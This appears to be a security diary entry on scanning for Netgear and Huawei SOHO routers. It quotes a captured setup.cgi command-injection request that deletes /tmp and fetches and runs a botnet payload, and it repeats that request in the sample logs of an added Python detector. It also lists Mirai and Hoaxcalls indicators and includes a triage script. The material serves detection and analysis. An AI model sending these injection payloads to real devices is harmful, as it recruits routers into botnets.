Scanning for SOHO Routers

Published: 2020-10-03
Last Updated: 2020-10-03 20:19:49 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

In the past 30 days I have seen lots of scanning activity looking for small office and home office (SOHO) routers, in particular Netgear devices. The request below, captured on 2 October, is representative: it calls setup.cgi with todo=syscmd and passes a shell command in the cmd parameter that wipes /tmp, fetches a payload with wget and executes it.

20201002-165049: data 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n'
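The following is an added example, not code from the diary: a small detector that picks this probe out of honeypot-style request logs, decodes the injected command and pulls out the payload download URLs. The log lines in it are constructed for the example in the same "timestamp: data '<raw request>'" shape as the capture above; the host 192.0.2.10 is a documentation address standing in for the one the diary redacts (http[:]//).

```python
"""Detect the Netgear setup.cgi command-injection probe in HTTP request logs.

Added example, not code from the diary. The log lines below are constructed
for this example; the download host 192.0.2.10 is a documentation address.
"""
import re
from urllib.parse import unquote_plus

SAMPLE_LOGS = [
    # Probe as quoted in the diary, with a placeholder download host filled in.
    "20201002-165049: data 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd"
    "&cmd=rm+-rf+/tmp/*;wget+http://192.0.2.10/Mozi.m;sh+netgear&curpath=/"
    "&currentsetting.htm=1 HTTP/1.0\\r\\n\\r\\n'",
    # Benign request: must not match.
    "20201002-170312: data 'GET /index.html HTTP/1.1\\r\\n\\r\\n'",
    # Same probe with the command percent-encoded, as some scanners send it.
    "20201002-171500: data 'GET /setup.cgi?todo=syscmd&next_file=netgear.cfg"
    "&cmd=wget%20http%3A%2F%2F192.0.2.10%2FAstra.mpsl%3Bsh%20Astra.mpsl"
    "&curpath=%2F HTTP/1.0\\r\\n\\r\\n'",
]

RECORD_RE = re.compile(r"^(?P<ts>\S+): data '(?P<method>[A-Z]+) (?P<target>\S+) HTTP/")
URL_RE = re.compile(r"https?://[^\s;|&'\"<>]+")


def parse_query(query):
    """Split a query string on '&' only and decode each key and value.

    Done by hand rather than with urllib.parse.parse_qs because older Python
    versions also split parse_qs on ';', which would cut the injected command
    ("rm -rf /tmp/*;wget ...;sh netgear") into pieces.
    """
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def parse_record(line):
    """Return {ts, method, path, params} for a request line, or None otherwise."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ts": m.group("ts"), "method": m.group("method"),
            "path": path, "params": parse_query(query)}


def is_netgear_syscmd_probe(rec):
    """The diary's probe: setup.cgi called with todo=syscmd and a cmd to run."""
    return (rec is not None
            and rec["path"].endswith("/setup.cgi")
            and rec["params"].get("todo") == "syscmd"
            and "cmd" in rec["params"])


def scan(lines):
    """Return one hit per probe with the decoded command and any payload URLs."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if is_netgear_syscmd_probe(rec):
            cmd = rec["params"]["cmd"]
            hits.append({"ts": rec["ts"], "cmd": cmd, "urls": URL_RE.findall(cmd)})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["ts"], hit["urls"], repr(hit["cmd"]))
```

Matching on the decoded parameters rather than on the raw request string is what makes the percent-encoded variant in the third sample line match too; the extracted URLs are the ones worth feeding into a sandbox or blocklist.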

Sampling multiple Mozi.a and Mozi.m files, analysis of each sample indicates that, if the command injection succeeds, the payload would attempt to connect the router to the Mirai botnet.

However, one of the recovered file samples (Astra.mpsl) had never been submitted to VirusTotal or any other sandbox and remained unidentified. Based on the information contained in the file, it is targeting the Huawei Home Gateway. One of the tell-tale signs in the binary is the following string: 'Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS', which likely indicates it would connect the router to the Hoaxcalls botnet.

This is part of the content of Astra.mpsl, which shows that the targeted router is the Huawei Home Gateway.

Suspicious Files and Scripts: Mozi.a/m (Mirai Botnet)


Suspicious Files and Scripts: (Hoaxcalls Botnet)
MD5:    98eaa9a34533606924911ef15162102f  Astra.mpsl
SHA256: cf6b4ccfc0414297a8a31c9349b6c3c246716829d4a15f3a2d3deae10bc2efde  Astra.mpsl
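Putting the two indicators above to work (the hashes of Astra.mpsl and the tell-tale banner string from the binary), here is an added example of a first-pass triage for a recovered router bot sample. It is not the diary author's code. The byte blob it runs on is constructed for the example: it carries the Hoaxcalls banner string and a few generic strings, so its hashes will not match the real Astra.mpsl values and the hash check comes back empty, which is exactly the "never seen before" situation the diary describes.

```python
"""Triage a recovered router bot binary against hash and string indicators.

Added example, not code from the diary. CONSTRUCTED_SAMPLE is a fabricated
byte blob for this example, not the real Astra.mpsl.
"""
import hashlib
import re

# MD5 and SHA256 of Astra.mpsl as listed in the diary.
KNOWN_HASHES = {
    "md5": {"98eaa9a34533606924911ef15162102f": "Astra.mpsl (Hoaxcalls)"},
    "sha256": {"cf6b4ccfc0414297a8a31c9349b6c3c246716829d4a15f3a2d3deae10bc2efde":
               "Astra.mpsl (Hoaxcalls)"},
}

# String signature: the tell-tale banner quoted in the diary.
SIGNATURES = [
    ("hoaxcalls_banner",
     b"Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS"),
]

# Constructed stand-in for a sample: ELF magic bytes plus padding (not a real
# header), the banner, one busybox path and a short string below the
# strings() length threshold.
CONSTRUCTED_SAMPLE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS\x00"
    + b"/bin/busybox\x00" + b"\x01\x02\x03" + b"GET /\x00"
)


def strings(data, min_len=6):
    """Extract printable ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def hash_blob(data):
    """MD5 and SHA256 hex digests, the two forms the diary lists."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def triage(data):
    """Check hashes against known IOCs, then fall back to string signatures."""
    hashes = hash_blob(data)
    hash_hits = [KNOWN_HASHES[algo][digest]
                 for algo, digest in hashes.items() if digest in KNOWN_HASHES[algo]]
    sig_hits = [name for name, needle in SIGNATURES if needle in data]
    if hash_hits:
        verdict = "known IOC"
    elif "hoaxcalls_banner" in sig_hits:
        verdict = "likely Hoaxcalls"
    else:
        verdict = "unidentified"
    return {"hashes": hashes, "hash_hits": hash_hits,
            "signature_hits": sig_hits, "verdict": verdict,
            "strings": strings(data)}


if __name__ == "__main__":
    result = triage(CONSTRUCTED_SAMPLE)
    print(result["verdict"], result["hashes"], result["signature_hits"])
    for s in result["strings"]:
        print("  ", s)
```

The order matters: a hash match is authoritative, a banner string only supports a "likely" attribution, and a sample that matches neither is reported as unidentified rather than silently dropped, so it can be submitted to a sandbox and the hash list extended.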

Indicators of Compromise


SOHO Active Scanners


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

